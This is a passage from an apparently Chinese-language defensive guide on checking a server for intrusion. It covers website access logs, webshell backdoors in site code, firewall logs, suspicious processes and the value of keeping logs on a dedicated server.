如果你的伺服器有提供網站服務，請自己檢查一下網站的訪問日誌，很多入侵都是通過有漏洞的網站進來的。除此以外，還要看網站原始碼有沒有被修改，因為黑客比較喜歡在網站程式碼中留Webshell後門。

留意防火牆日誌

防火牆可以是專業的硬體防火牆裝置或作業系統自帶的防火牆，如Windows Firewall或iptables。這些防火牆如果記錄了網路連線請求日記，請仔細檢查，確定是否有可以的網路連線，那可能是木馬程式產生的。

留意可以的程序

如果發現有你不認識的程序，請留意一下該程式的路徑，如果程式體積很小或者有網路活動，基本上可以判斷這是一個木馬。另外Windows系統如果平白多了一些cmd.exe程序，那基本也能判定這是木馬用來執行命令的程序。

以上是一些常用的手段，實際上要100%確定伺服器是否被入侵，只做這些還遠遠不夠的。俗話說巧婦難為無米之炊，對於網路安全防護人員來說，日誌就是他的大米，所以伺服器應儘量記錄更多的日誌，並妥善儲存好，最好能儲存到專用的日誌伺服器。這樣一旦伺服器出現異常，這些日誌將有助於判斷伺服器是否被入侵了。